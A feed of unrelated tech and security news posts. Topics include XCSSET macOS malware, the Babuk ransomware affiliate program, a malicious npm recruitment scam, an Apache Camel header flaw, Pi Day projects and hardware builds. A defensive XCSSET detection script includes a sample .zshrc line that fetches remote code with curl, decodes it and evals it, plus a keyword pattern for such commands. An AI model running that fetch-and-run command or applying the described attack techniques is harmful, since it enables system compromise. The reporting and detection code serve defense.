
C+P: Combining the Usefulness of C with the Excellence of Prolog


In a move that will absolutely not over-excite anyone, nor lead to any heated arguments, [needleful] posits that their C Plus Prolog (C+P for short) programming language is the best possible language ever. This is due to it combining the best of the only good programming language (Prolog) with the best of the only useful programming language (C). Although the resulting mash-up syntax may trigger Objective-C flashbacks, it’s actually valid SWI-Prolog, which is subsequently converted to C for compilation.

Language flamewars aside, the motivation for C+P as explained in the project’s README was mostly to explore macros in a systems programming language. More specifically, by implementing a language-within-a-language you can add just about any compile-time feature you want, including – as demonstrated in C+P – a form of generics. Even as a way to have a bit of fun, C+P comes dangerously close to being a functional prototype. Its main flaw is probably the lack of validation and error messages, which likely leads to broken C being generated.

Also mentioned are the Nim and Haxe languages, which can be compiled (transpiled) to C or C++ and are thus a similar idea to C+P, as well as cmacro (based on Common Lisp) and the D language.


hackaday.com/2025/03/14/cp-com…


Babuk Locker 2.0: the new ransomware affiliate program announced


Babuk, one of the best-known ransomware groups in the cybercrime landscape, has launched the Babuk Locker 2.0 Affiliate Program 2025, an affiliate program for experienced hackers who want to earn money from ransomware attacks. The program, published on their data leak site, introduces new advanced features and a more structured model for those who want to join their criminal network.

How the program works


Babuk Locker 2.0 accepts affiliates from all over the world, regardless of language or origin, provided they have experience in penetration testing and in compromising computer systems. Their goal is clear: maximize earnings with targeted attacks and manage ransoms more effectively. The platform lets affiliates handle communications with victims and extortion operations on their own.

What’s new in the platform


The new version of Babuk Locker introduces several features to simplify cybercriminals’ operations, including:

  • Control panel on Tor: an interface for managing attacks and negotiating ransoms.
  • Chat with victims: a messaging system with notifications and file transfer.
  • Decryption verification: the ability to prove to victims that the ransomware can actually restore the files.
  • Babuk Stealer: a module for stealing data before encryption.
  • Automatic data upload: affiliates can upload stolen information directly to the group’s blog.
  • Network scanner: to find shared resources on the victim’s network.
  • Automatic ransomware distribution: the malware spreads without the need for scripts or advanced configuration.


How much affiliates earn


Babuk Locker 2.0 provides for a fixed 10% commission on the ransoms received by affiliates. Each affiliate can negotiate directly with the victim and then transfer the percentage owed to the Babuk group. To ensure participants are serious, the program requires an initial deposit of 25,000 USD in Bitcoin, a strategy intended to keep out law enforcement infiltrators or undercover investigators.

Who can be attacked and who cannot


Babuk has set some rules about which targets may be hit:

  • Attacks on critical infrastructure prohibited: nuclear power plants, public hospitals and post-Soviet organizations are off-limits.
  • Permitted targets: private companies, for-profit educational institutions, pharmaceutical companies and cosmetic clinics.
  • Encouraged attacks: police forces and government agencies engaged in fighting cybercriminals.


Conclusion


The Babuk Locker 2.0 Affiliate Program 2025 shows how sophisticated and organized the ransomware model is becoming. With increasingly advanced tools and direct management of negotiations, the Babuk group positions itself as one of the most dangerous actors in the cybercriminal landscape. For companies, staying vigilant and strengthening security measures is the only way to counter these increasingly aggressive threats.

The article Babuk Locker 2.0: the new ransomware affiliate program announced comes from il blog della sicurezza informatica.


XCSSET: the invisible malware threatening macOS developers


Microsoft Threat Intelligence recently discovered a new variant of XCSSET, a sophisticated malware designed to infect Xcode projects on macOS. This updated version introduces significant improvements in code obfuscation, persistence techniques and infection strategies, increasing the malware’s ability to evade security controls and compromise developers’ systems. The threat is particularly dangerous because of its modular nature and its ability to exfiltrate sensitive information, including personal files, credentials and even data relating to digital wallets.

A persistent and evolving threat


XCSSET was first identified in 2020 as malware capable of infecting Xcode projects, targeting macOS developers in a stealthy way. Its attack strategy involved modifying files associated with development projects, spreading automatically to users who downloaded and compiled the infected code.

The new variant, the first detected since 2022, has advanced features compared with previous versions. Besides implementing more refined obfuscation techniques, the malware uses new persistence mechanisms, which allow it to remain active even after a system reboot. Greater modularity of the code has also been observed, suggesting that XCSSET’s authors have developed a scalable framework for delivering customized malicious payloads.

Analysis of the attack structure: interpreting the attached image


The attached image provides a visual representation of XCSSET’s complex infrastructure, highlighting its many points of contact and interconnections with malicious modules, command and control (C2) servers and infection methods.

  • Central core (XCSSET): At the center of the map is the main node, representing the XCSSET malware, from which connections branch out to the various components and attack mechanisms.
  • Connections to C2 servers: The lines extending to the right link XCSSET to numerous malicious domains and command and control servers. These servers act as management hubs for the malware, letting attackers send commands, update malicious modules and collect stolen data.
  • Persistence and infection methods: The connections on the left illustrate the persistence techniques used by XCSSET, such as modifying the shell configuration file (zshrc), compromising Xcode builds and abusing legitimate tools to ensure its survival on the infected system.
  • Targets and attack vectors: The right-hand side of the image shows numerous targets and infected modules, suggesting a highly scalable attack strategy capable of hitting macOS developers worldwide. The presence of multiple modules demonstrates the malware’s modular nature and the attackers’ ability to update it with new features.

The analysis of the image highlights XCSSET’s sophisticated architecture and how it manages to distribute its components effectively, making detection and removal extremely difficult.

Advanced obfuscation techniques and modular structure


One of the most insidious aspects of this new variant is the adoption of a more sophisticated obfuscation system. Module names have been disguised to make static analysis harder, while heavy use of scripting languages and legitimate binaries lets the malware operate discreetly.

The malware’s modular structure allows attackers to update its features without having to distribute a whole new version, increasing the flexibility and longevity of the threat. The capabilities identified include:

  • Decoding and executing obfuscated payloads to avoid detection by antivirus software.
  • Extensive use of UNIX commands to ensure compatibility with macOS systems.
  • Exploitation of legitimate tools to run the malicious code, reducing the risk of being spotted by security tools.


Improved persistence techniques


To ensure survival on the infected system, XCSSET implements three different persistence techniques:

  1. Modifying the Zsh shell configuration file (“zshrc” method): The malware injects malicious code into the shell configuration file, causing it to run automatically every time a user opens a new terminal session.
  2. Abusing the DockUtil tool (“dock” method): XCSSET downloads and uses DockUtil, a legitimately signed tool, to modify the macOS Dock settings. A fake application named Launchpad is created that runs both the genuine application and the malware.
  3. Infecting the Git process (“git” method): The malicious code is injected into Git workflows, ensuring the malware runs during commit operations.


Conclusion and mitigation measures


The evolution of XCSSET shows how cyber threats are constantly changing, adopting new strategies to evade security controls. To mitigate the risks associated with this threat, developers should take the following precautions:

  • Always verify the integrity of Xcode projects before compiling them.
  • Use up-to-date security tools to identify any anomalies.
  • Monitor network traffic to spot suspicious communications with C2 servers.
  • Limit the use of unverified scripts within development projects.
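The three persistence locations described above (the zshrc file, a Dock tile impersonating Launchpad, and Git hooks) are the places a developer can check on their own machine. The script below is an added example, not Microsoft’s tooling or code from the article; it assumes the genuine Launchpad bundle lives at /System/Applications/Launchpad.app, and its shell-keyword list and executable-hook check are heuristics of my own, run here over constructed samples.

```python
"""Host-side checks for the three XCSSET persistence methods discussed above.

Added example. The heuristics (download/eval keywords in ~/.zshrc, a Dock
tile labelled "Launchpad" that does not point at the system bundle, and
executable non-sample Git hooks) are assumptions for illustration.
"""
import os
import plistlib
import re
import stat
import tempfile

# Assumed path of the genuine Launchpad bundle on current macOS releases.
GENUINE_LAUNCHPAD = "/System/Applications/Launchpad.app"

# Heuristic: shell-init lines that fetch, decode or evaluate something.
ZSHRC_PATTERN = re.compile(r"\b(curl|wget|base64|eval|osascript|nohup)\b")


def scan_zshrc(text):
    """Return (line number, line) pairs in a .zshrc that match the heuristic."""
    hits = []
    for num, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments never execute
        if ZSHRC_PATTERN.search(stripped):
            hits.append((num, stripped))
    return hits


def scan_dock_plist(plist_bytes):
    """Return Dock tiles labelled Launchpad whose target is not the system bundle."""
    dock = plistlib.loads(plist_bytes)
    findings = []
    for tile in dock.get("persistent-apps", []):
        data = tile.get("tile-data", {})
        label = data.get("file-label", "")
        url = data.get("file-data", {}).get("_CFURLString", "")
        if label.lower() == "launchpad" and GENUINE_LAUNCHPAD not in url:
            findings.append(url)
    return findings


def scan_git_hooks(hooks_dir):
    """Return executable hook files that are not Git's stock *.sample stubs."""
    if not os.path.isdir(hooks_dir):
        return []
    active = []
    for entry in os.scandir(hooks_dir):
        if entry.name.endswith(".sample") or not entry.is_file():
            continue
        if entry.stat().st_mode & stat.S_IXUSR:
            active.append(entry.name)
    return sorted(active)


def run_demo():
    """Run all three checks over constructed samples and return the findings."""
    # Constructed .zshrc: one benign alias, one line fetching and evaluating code.
    zshrc = (
        "# user aliases\n"
        "alias ll='ls -la'\n"
        "eval \"$(curl -fsSL http://example.invalid/loader | base64 -d)\"\n"
    )
    # Constructed Dock plist: the genuine Launchpad plus a look-alike in ~/Library.
    dock = plistlib.dumps({
        "persistent-apps": [
            {"tile-data": {"file-label": "Launchpad", "file-data": {
                "_CFURLString": "file:///System/Applications/Launchpad.app/"}}},
            {"tile-data": {"file-label": "Launchpad", "file-data": {
                "_CFURLString": "file:///Users/dev/Library/Launchpad.app/"}}},
        ]
    })
    # Constructed .git/hooks directory: a stock sample plus an executable pre-commit.
    with tempfile.TemporaryDirectory() as tmp:
        hooks = os.path.join(tmp, "hooks")
        os.mkdir(hooks)
        with open(os.path.join(hooks, "pre-commit.sample"), "w") as f:
            f.write("#!/bin/sh\n")
        hook = os.path.join(hooks, "pre-commit")
        with open(hook, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(hook, 0o755)
        git_hits = scan_git_hooks(hooks)
    return {"zshrc": scan_zshrc(zshrc), "dock": scan_dock_plist(dock), "git": git_hits}


if __name__ == "__main__":
    for check, hits in run_demo().items():
        print(check, "->", hits)
```

On a real machine, point the three scanners at ~/.zshrc, ~/Library/Preferences/com.apple.dock.plist and each repository's .git/hooks directory; a hit is a lead to inspect, not proof of infection.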

The analysis by Microsoft Threat Intelligence underlines the importance of maintaining high levels of cybersecurity, especially in development environments. macOS developers must be aware of emerging threats and take proactive measures to protect their code and systems from sophisticated attacks such as XCSSET.

The article XCSSET: the invisible malware threatening macOS developers comes from il blog della sicurezza informatica.


Pi Hand is a Digital Display of a Different Sort


Hackers enjoy a good theme, and so it comes as no surprise that every time March 14th (Pi Day) rolls around, the tip line sees an uptick in mathematical activity. Whether it’s something they personally did or some other person’s project they want to bring to our attention, a lot of folks out there are very excited about numbers today.

One of our most prolific circumference aficionados is [Cristiano Monteiro], who, for the last several years, has put together a special project to commemorate the date. For 2025, he’s come up with a robotic hand that will use its fingers to show the digits of Pi one at a time. Since there’s only one hand, anything higher than five will be displayed as two gestures in quick succession, necessitating a bit of addition on the viewer’s part.

[Cristiano] makes no claims about the anatomical accuracy of his creation. Indeed, if your mitts look anything like this, you should seek medical attention immediately. But whether you think of them as fingers or nightmarish claws, it’s the motion of the individual digits that matter.

To that end, each one is attached to an MG90 servo, which an Arduino Nano drives with attached Servo Shield. From there, it’s just a matter of code to get the digits wiggling out the correct value, which [Cristiano] has kindly shared for anyone looking to recreate this project.

If you’re hungry for more Pi, the ghostly display that [Cristiano] sent in last year is definitely worth another look. While not directly related to today’s mathematical festivities, the portable GPS time server he put together back in 2021 is another fantastic build you should check out.



hackaday.com/2025/03/14/pi-han…


Hackaday Podcast Episode 312: Heart Attacks, the Speed of Light, and Self-balancing


Elliot does the podcast on the road to Supercon Europe, and Al is in the mood for math and nostalgia this week. Listen in and find out what they were reading on Hackaday this week.

The guys talked about the ESP-32 non-backdoor and battery fires. Then it was on to the hacks.

Self-balancing robots and satellite imaging were the appetizers, but soon they moved on to Kinect cameras in the modern day. Think you can’t travel at the speed of light? Turns out that maybe you already are.

Did you know there was a chatbot in 1957? Well, sort of. For the can’t miss stories: watches monitor your heart and what does the number e really mean?

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!


Download in DRM-free MP3 and stream it on the big speakers.


Episode 312 Show Notes:

What’s that Sound?


  • We had a ton of answers this week, and many of them were correct. It was a disposable film camera being wound and shot. Congratulations to [Bobby Tables] for getting the correct answer and winning the webcam-driven dice toss.


hackaday.com/2025/03/14/hackad…


You Know Pi, But Do You Really Know E?


Pi Day is here! We bet that you know that famous constant to a few decimal points, and you could probably explain what it really means: the ratio of a circle’s circumference to its diameter. But what about the constant e? Sure, you might know it is a transcendental number around 2.72 or so. You probably know it is the base used for natural logarithms. But what does it mean?

The poor number probably needed a better agent. After all, pi is a fun name, easy to remember, with a distinctive Greek letter and lots of pun potential. On the other hand, e is just a letter. Sometimes it is known as Euler’s number, but Leonhard Euler was so prolific that there is also Euler’s constant and a set of Euler numbers, none of which are the same thing. Sometimes, you hear it called Napier’s constant, and it is known that Jacob Bernoulli discovered the number, too. So, even the history of this number is confusing.

But back to math, the number e is the base rate of growth for any continually growing process. That didn’t help? Well, consider that many things grow or decay through growth. For example, a bacteria culture might double every 72 hours. Or a radioactive sample might decay a certain amount per century.

Classic


The classic example is compound interest. Suppose you have $100, and you put it in the bank for a 10% per year return (please tell us where we can find that, by the way). So at the end of the year, we have $110, right? But what if you compound it every six months?

To figure that out, you look at the $100 after six months. The annual interest on the money is still $10, but we are only at 6 months, so prorated, that’s $5. Therefore, after six months, we have $105. At the end of the year, we look at 10% of $105 ($10.50). That’s still for a year, so we need to halve it ($5.25) and add it in ($105 + $5.25 = $110.25). So, compounding every six months means we get an extra quarter compared to simple interest.

What if it was compounded monthly? Now, we divide our interest by 12, but we have a little more money every month. After the first month, we have $100.83 ($100.00 + 10/12). The second month’s net is $101.67. By the end of the year, you have $110.47. Not quite twice as much extra as you had before.

So what if you could compound weekly? Or daily? Or hourly? Generally, you’ll get more, at least up to a point. Eventually, the interest will be split up so much that it will balance the increase and, at that point, you won’t make any more. There is an upper limit to how much money we can have at the end of the year at 10%, no matter how often you compound the interest.

So Where’s e?


Assume you could get a 100% return on your money (definitely let us know how to do that). That means if you go for a year, that’s a return of 2 — you double your money. But if you split the year in half and compound, you get 2.25 times the original amount. You can try a few more splits, and you’ll find the equation for growth is (1+1/n)^n. That is, if you only compute it once (n=1), you get double (1+1). If you compute interest twice, you get 2.25 (that is, (1+1/2)^2).

If you set n to 1,000, the return will be 2.7169. That’s even better than 2.25. So 100,000 should be wildly better, right? Not so much. At 100,000 you get a 2.71814 return. At 10,000,000 the rate is 2.71828 (or so).

Look at those numbers. Going from 1,000 to 10,000,000 only increases yield by about 0.001. If you know calculus, you might know how to take the limit of the growth equation. If not, you can still see it is going to top off at around 2.718. Those are the first digits of e.

Of course, e is like pi — transcendental — so you can’t ever get all the digits. You just keep getting closer and closer to the actual value. But 2.718 is pretty close for practical purposes.

Scaling


We can scale e to whatever problem we have at hand. We just have to be mindful of the starting amount, the rate, and what a time period means. For example, to work with our 10% rate (instead of 100%) we have to consider the rate e^0.10 or about 1.105. Then, to scale for amounts, we have to multiply by the rate. So remember our $100 at 10% example? Our maximum return is 100 x 1.105 = 110.50. Why did we only get $110.47? Because we compounded 12 times. The $110.50 result is the maximum.

More Years


You can also multiply the rate by the number of periods. So if we left the money in for five years: 100 x e^(0.10 x 5). If you think about it, then, making 50% for one year has the same maximum as making 10% for 5 years (or 25% for 2 years).

Negative Growth?


Suppose you have 120 grams of some radioactive material that decays at a rate of 50% per year. How much will be left after three years? Simplistically, it seems like the answer is that it will be depleted after two years. But that’s not true.

Just as compounding adds more money, a decay rate removes some of the radioactive material, meaning the absolute decay rate gets slower and slower with time because it is a percentage of the radioactive material’s mass.

Just for the sake of an example, suppose at some imaginary small period, the sample is at 100 grams and, thus, the decay rate is 50 grams/year. Later, the sample is at 80 grams. The decay rate is 40 grams/year, so it will take longer to go from 80 to 60 than it did to go from 100 to 80.

In this case, the rate is negative, so the formula will be 120 x e^(-0.5 x 3). That means you will have about 26.8 grams of radioactive material left in three years.

Modeling


Consider the classic equation for an RC circuit: Vc=Vs(1-e^(-t/(RC))). Here, Vc is the capacitor voltage, Vs is the supply voltage, t is in seconds, and RC is the product of the resistance in ohms and the capacitance in farads.

What can we infer from this? Well, you could also write this as: Vc=Vs-Vs x e^(-t/(RC)). Looking at our earlier model for money, it is plain that Vs is the voltage we start with, t is the time, and the rate is -1/RC (time can’t be negative, after all). That makes sense because RC is the time constant in seconds, so 1/RC is the rate per second. The formula tells us how much voltage is charged in the capacitor, and subtracting that from Vs gives us the voltage drop across the capacitor.

Think about this circuit:

At t=0, we have Vs(1-e^0), which is 0. At t=0.5, the voltage should be about 7.86V; at t=1, it should be up to 10.57V. As you can see, the simulation matches the math well enough.

Discharging is nearly the same: Vc=V0 x e^(-t/(RC)). Obviously, V0 is the voltage you started with and, again, -1/RC is the rate.

So Now You Know!


There’s a common rule of thumb that after a time period (RC) a capacitor will charge to about 63% or discharge to about 37%. Now that you know the math, you can see that e^-1=0.37 and 1-e^-1=0.63. If you want to do the actual math, you can always set up a spreadsheet.

Anything that grows or shrinks exponentially is a candidate for using an equation involving e. That’s why it is a common base for logarithms. Of course, most slide rules use logarithms, but not all of them do.
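The compounding limit, the scaled growth and decay formulas, and the RC curve from the sections above, carried through in code. This is an added example rather than the article’s own spreadsheet; the 12 V supply and RC = 0.47 s are assumptions chosen because they reproduce the 7.86 V and 10.57 V quoted for the circuit, which is not shown here.

```python
"""Worked numbers for the e article: compounding, e^(rate*time), and RC charging.

Added example. Vs = 12 V and RC = 0.47 s are assumed values that reproduce the
7.86 V (t = 0.5 s) and 10.57 V (t = 1 s) quoted for the unseen circuit.
"""
import math


def compound(principal, rate, periods):
    """Grow `principal` at annual `rate`, compounded `periods` times in one year."""
    return principal * (1 + rate / periods) ** periods


def growth_limit(n):
    """(1 + 1/n)^n: the 100%-return sequence whose limit is e."""
    return (1 + 1 / n) ** n


def continuous(principal, rate, years):
    """Continuous compounding, principal * e^(rate*years); a negative rate is decay."""
    return principal * math.exp(rate * years)


def rc_charge(vs, rc, t):
    """Capacitor voltage while charging from 0 V toward vs through the RC time constant."""
    return vs * (1 - math.exp(-t / rc))


def rc_discharge(v0, rc, t):
    """Capacitor voltage while discharging from v0 through the same time constant."""
    return v0 * math.exp(-t / rc)


def convergence_table(principal=100.0, rate=0.10):
    """Compounding ever more often approaches, but never exceeds, the continuous value."""
    rows = {}
    for periods in (1, 2, 12, 52, 365, 8760):  # yearly ... hourly
        rows[periods] = round(compound(principal, rate, periods), 2)
    rows["continuous"] = round(continuous(principal, rate, 1), 2)
    return rows


if __name__ == "__main__":
    for periods, value in convergence_table().items():
        print(f"$100 at 10%, {periods} compounding(s): ${value}")
    for n in (1, 2, 1000, 100_000, 10_000_000):
        print(f"(1+1/{n})^{n} = {growth_limit(n):.5f}")
    print(f"120 g decaying at 50%/yr for 3 yr: {continuous(120, -0.5, 3):.1f} g")
    print(f"10% for 5 yr = 50% for 1 yr? {continuous(100, 0.1, 5):.2f} vs "
          f"{continuous(100, 0.5, 1):.2f}")
    for t in (0.0, 0.47, 0.5, 1.0):
        print(f"RC charge at t={t}s: {rc_charge(12.0, 0.47, t):.2f} V")
```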

(Title image showing e living in pi’s shadow adapted from “Pi” by [Taso Katsionis] via Unsplash.)


Utah’s FORGE: a Research Laboratory For Enhanced Geothermal Systems


Geothermal heat is a tantalizing source of energy that’s quite literally right below our feet. At the same time, geothermal energy is hard to develop, as the Earth’s crust is too thick in most places, limiting this to areas where magma is close enough to the surface and the underground rock is permeable enough for water. The Utah FORGE facility is a field site where researchers are developing and testing ways to increase the scope of geothermal energy.

An Enhanced Geothermal System (EGS) is designed to be capable of using geothermal energy where this is normally not feasible through a technique that’s reminiscent of the hydraulic fracturing (‘fracking’) used by the oil and gas industry, but rather than creating more fractures, it instead uses hydro-shearing to prop open existing fractures and thus create the through-flow of water needed to extract geothermal energy.

So far FORGE has reported the successful creation of a geothermal reservoir where before there was none. This facility is located in the Milford valley in southwest Utah, which has some hydrothermal activity at the nearby Roosevelt Hot Springs, but through EGS other parts of this valley and similar areas could conceivably be used for generating electricity and for community heating as well. In a 2024 study by University of Utah scientists, it is described how the Milford valley’s volcanic past has left a large body of magma below a thick barrier of granitic rock that could provide access to geothermal resources with EGS to create the requisite fluid permeability.

FORGE is not the only facility working on EGS, but many other sites around the world have ceased activities after issues ranging from induced seismicity and susceptibility to earthquakes to budget shortages. Much like fracking, EGS is likely to cause earthquakes. Whether EGS can be made economically feasible still remains to be seen.


hackaday.com/2025/03/14/utahs-…


This Week in Security: The X DDoS, The ESP32 Basementdoor, and the camelCase RCE


We would be remiss if we didn’t address the X Distributed Denial of Service (DDoS) attack that’s been happening this week. It seems like everyone is trying to make political hay out of the DDoS, but we’re going to set that aside as much as possible and talk about the technical details. Elon made an early statement that X was down due to a cyberattack, with the source IPs tracing back to “the Ukraine area”.

The latest reporting seems to conclude that this was indeed a DDoS, and a threat group named “Dark Storm” has taken credit for the attack. Dark Storm does not seem to be of Ukrainian origin or affiliation.

We’re going to try to read the tea leaves just a bit, but remember that about the only thing we know for sure is that X was unreachable for many users several times this week. This is completely consistent with the suspected DDoS attack. The quirk of modern DDoS attacks is that the IP addresses on the packets are never trustworthy.

There are two broad tactics used for large-scale DDoS attacks, sometimes used simultaneously. The first is the simple botnet. Computers, routers, servers, and cameras around the world have been infected with malware, and then remote controlled to create massive botnets. Those botnets usually come equipped with a DDoS function, allowing the botnet runner to task all the bots with sending traffic to the DDoS victim IPs. That traffic may be UDP packets with spoofed or legitimate source IPs, or it may be TCP SYN (synchronization) requests with spoofed source IPs.

The other common approach is the reflection or amplification attack. This is where a public server can be manipulated into sending unsolicited traffic to a victim IP. It’s usually DNS, where a short message request can return a much larger response. And because DNS uses UDP, it’s trivial to convince the DNS server to send that larger response to a victim’s address, amplifying the attack.

Put these two techniques together, and you have a botnet sending spoofed requests to servers, that unintentionally send the DDoS traffic on to the target. And suddenly it’s understandable why it’s so difficult to nail down attribution for this sort of attack. It may very well be that a botnet with a heavy Ukrainian presence was involved in the attack, which at the same time doesn’t preclude Dark Storm as the originator. The tea leaves are still murky on this one.

That ESP32 Backdoor


As Maya says, It Really Wasn’t a backdoor. The Bleeping Computer article and Tarlogic press release have both been updated to reflect the reality that this wasn’t really a backdoor. Given that the original research and presentation were in Spanish, we’re inclined to conclude that the “backdoor” claim was partially a translation issue.

The terminology storm set aside, what researchers found really was quite interesting. The source of information was official ESP32 binaries that implement the Bluetooth HCI, the Host Controller Interface. It’s a structured format for talking to a Bluetooth chip. The official HCI has set aside command space for vendor-specific commands. The “backdoor” that was discovered was this set of undocumented vendor-specific commands.

These commands were exposed over the HCI interface, and included low-level control over the ESP32 device. However, for the vast majority of ESP32 use cases, this interface is only available to code already running on the device, and thus isn’t a security boundary violation. To Espressif’s credit, their technical response does highlight the case of using an ESP32 in a hosted mode, where an external processor is issuing HCI commands over something like a serial link. In that very narrow case, the undocumented HCI commands could be considered a backdoor, though it still requires compromise of the controlling device first.

All told, it’s not particularly dangerous as a backdoor. It’s a set of undocumented instructions that expose low-level functions, but only from inside the house. I propose a new term for this: a Basementdoor.

The Fake Recruitment Scam


The fake recruitment scam isn’t new to this column, but this is the first time we’ve covered a first-hand account of it. This is the story of [Ron Jansen], a freelance developer with impressive credentials. He got a recruiter’s message, looking to interview him for a web3 related position. Interviews often come with programming tasks, so it wasn’t surprising when this one included instructions to install something from Github using npm and do some simple tasks.

But then, the recruiter and CTO both went silent, and [Ron] suddenly had a bad feeling about that npm install command. Looking through the code, it looked boring, except for the dependency NPM package, process-log. With only 100-ish weekly downloads, this was an obvious place to look for something malicious. It didn’t disappoint, as this library pulled an obfuscated blob of JSON code and executed it during install. The deobfuscated code establishes a websocket connection, and uploads cookies, keychains, and any other interesting config or database files it can find.

Once [Ron] knew he had been had, he started the infuriating-yet-necessary process of revoking API keys, rotating passwords, auditing everything, and wiping the affected machine’s drive. The rest of the post is his recommendations for how to avoid falling for this scam yourself. The immediate answer is to run untrusted code in a VM or sandbox. There are tools like Deno that can also help, doing sandboxing by default. Inertia is the challenge with a major change like that.

Camel CamelCase RCE


Apache Camel is a Java library for doing Enterprise Integration Patterns. AKA, it’s network glue code for a specific use case. It sends data between endpoints, and uses headers to set certain options. One of the important security boundaries there is that internal headers shouldn’t be set by outside sources. To accomplish that, those headers are string compared with Camel and org.apache.camel as the starting characters. The problem is that the string comparison is exact, while the header names themselves are not case sensitive. It’s literally a camelCase vulnerability. The result is that all the internal headers are accessible from any client, via this case trickery.

The vulnerability has been fixed in the latest release of Camel. The seriousness of this vulnerability depends on the component being connected to. Akamai researchers provided a sample application, where the headers were used to construct a command. The access to these internal values makes this case an RCE. This ambiguity is why the severity of this vulnerability is disputed.
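The filter mismatch described above, reduced to its essence: a case-sensitive prefix test guarding names that are matched case-insensitively everywhere else. This is an added illustration in Python, not Apache Camel’s own Java code, and the header names in the sample are constructed; the point is the difference between the two predicates and what a case-normalizing fix looks like.

```python
"""Vulnerable vs. fixed internal-header filters modelled on the Camel issue.

Added example, not Apache Camel's code. Header names here are constructed.
"""

# Prefixes that mark a header as internal, per the article.
INTERNAL_PREFIXES = ("Camel", "org.apache.camel")


def is_internal_vulnerable(name):
    """Exact prefix test: a mixed-case spelling of the same header slips past it."""
    return name.startswith(INTERNAL_PREFIXES)


def is_internal_fixed(name):
    """Prefix test applied to the lower-cased name, matching how headers are looked up."""
    lowered = name.lower()
    return any(lowered.startswith(prefix.lower()) for prefix in INTERNAL_PREFIXES)


def strip_internal_headers(headers, is_internal):
    """Drop the headers `is_internal` classifies as internal; the rest reach the route."""
    return {name: value for name, value in headers.items() if not is_internal(name)}


def smuggled_headers(headers):
    """Names that survive the vulnerable filter but are removed by the fixed one."""
    survive_vulnerable = strip_internal_headers(headers, is_internal_vulnerable)
    survive_fixed = strip_internal_headers(headers, is_internal_fixed)
    return sorted(set(survive_vulnerable) - set(survive_fixed))


# Constructed inbound headers: one ordinary header, one internal name spelled
# exactly, and two case variants of internal names.
SAMPLE_HEADERS = {
    "Content-Type": "text/plain",
    "CamelInternalOption": "blocked-by-both",
    "cAmelInternalOption": "slips-through",
    "ORG.APACHE.CAMEL.Internal": "slips-through",
}


if __name__ == "__main__":
    print("reaches route (vulnerable):",
          sorted(strip_internal_headers(SAMPLE_HEADERS, is_internal_vulnerable)))
    print("reaches route (fixed):     ",
          sorted(strip_internal_headers(SAMPLE_HEADERS, is_internal_fixed)))
    print("smuggled by case trickery: ", smuggled_headers(SAMPLE_HEADERS))
```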

Bits and Bytes


Researchers at Facebook have identified a flaw in the FreeType font rendering library. It’s an integer underflow leading to a buffer overflow. An attacker can specify a very large integer value, and the library will add to that variable during processing. This causes the value to wrap around to a very small value, resulting in a buffer much too small to hold the given data. This vulnerability seems to be under active exploitation.

We don’t normally see problems with a log file leading to exploitation, but that seems to be the situation with the Below daemon. The service runs as root, and sets the logfile to be world readable. Make that logfile a symlink to some important file, and when the service starts, it overwrites the target file’s permissions.

Microsoft’s Patch Tuesday includes a whopping six 0-day exploits getting fixed this month. Several of these are filesystem problems, and at least one is an NTFS vulnerability that can be triggered simply by plugging in a USB drive.

The ruby-saml library had a weird quirk: it used two different XML parsers while doing signature validations. That never seems to go well, and this is not any different. It was possible to pack two different signatures into a single XML document, and the two different parsers would each see the file quite differently. The result was that any valid signature could be hijacked to attest as any other user. Not good. An initial fix has already landed, with a future release dropping one of the XML parsers and doing a general security hardening pass.


hackaday.com/2025/03/14/this-w…


ClockworkPi Unveils New PicoCalc Handheld


Do you like scientific calculators? Don’t bother answering that question, you’re reading Hackaday so we already know the answer. We also know you’re a fan of building things yourself and open source, which makes us fairly sure you’ll be just as interested in the recently announced ClockworkPi PicoCalc as we are.

On the surface, it looks like a chunky scientific calculator, though on further inspection you’ll note it comes equipped with a QWERTY keyboard. But open up the case and what you’ve really got is an elaborate carrier board for the Raspberry Pi Pico. The PicoCalc supports all variants of the microcontroller, but realistically we can’t think of any reason that you wouldn’t just use the latest version.

With the MCU connected, you’ll have access to the PicoCalc’s 320×320 4-inch IPS screen, backlit I2C-connected keyboard, SD card slot, 8 MB PSRAM, and dual PWM speakers. Power is provided by a pair of 18650 cells (which you’ll need to supply on your own), and the board has the necessary circuitry to charge them up over USB-C.

Everything is housed in an injection molded case, but the project page says all the necessary CAD files will eventually be released under the GPL v3 so you can 3D print or CNC your own enclosure. For now though, the only thing of note that seems to be in the PicoCalc GitHub repository is a PCB schematic.

The software side of things is a little less clear. The page mentions a BASIC interpreter, MP3 playback, and support for various programming languages, but we get the impression that’s just a list of stuff you can run on the Pi Pico. There are a few images that clearly show the PicoCalc actually being used as a calculator however, so there may be an official firmware yet to be revealed.

The PicoCalc kit is on sale now, and will set you back $75 USD — which actually includes a first-generation Pi Pico, on the off chance that you don’t already have a few laying around. We’ve been impressed with the previous offerings from ClockworkPi, so assuming this new kit maintains that same build quality, it seems like a fair enough price.


hackaday.com/2025/03/14/clockw…


The Trials and Tribulations of Building a Pasta Display


We love unique displays here at Hackaday. If you can figure out how to show information on some weird object, we’re all about it. So when [Julius Curt] wrote in to share his work on the Pasta Analog Display, we were hooked from the subject line.

But in reading his account, it ended up being even better than we hoped for. Because it turns out, getting pasta to behave properly in an electromechanical device is trickier than you might think. Oh sure, as [Julius] points out, those ridges on the side of penne might make them look like gears — but after spending the time and effort to build a particularly slick 3D printed frame to actually use them as such, it turns out they just won’t cooperate. You’d think the pasta makers of the world would have some respect for mechanical tolerances, but unfortunately not.

This version of the pasta display didn’t work, but we love the design.
So if [Julius] couldn’t use the natural shape of the penne to get them to rotate, what was the alternative? First, he switched to the far larger cannelloni. Their increased internal volume, most commonly used to hold spinach and ricotta, has in this case been stuffed with a 3D printed armature. Thus each cannelloni is physically attached to a gear, which means when one of them is rotated by a 28BYJ-48 stepper motor, the rest follow.

All that’s left is to apply some artwork to the pasta (again, easier said than done), and rotate them into position. Depending on how much you can cram onto each cannelloni, the display can be rotated to show several different messages. In the video below, [Julius] shows off three distinct images rendered at the push of a button.

If you get hungry while trying to turn pasta into a workable display medium, you can always cook and eat some of your building materials. Luckily, a couple years ago Barilla released the design for an open source device to help you cook their pasta more efficiently.

youtube.com/embed/mlT0Z5JhcTU?…


hackaday.com/2025/03/14/the-tr…


A Windows Privilege Escalation Exploited for 2 Years Fixed in Patch Tuesday. CISA and ACN Urge Updating


The March Patch Tuesday includes CVE-2025-24983, an elevation of privilege vulnerability in the Microsoft Windows Win32 kernel subsystem.

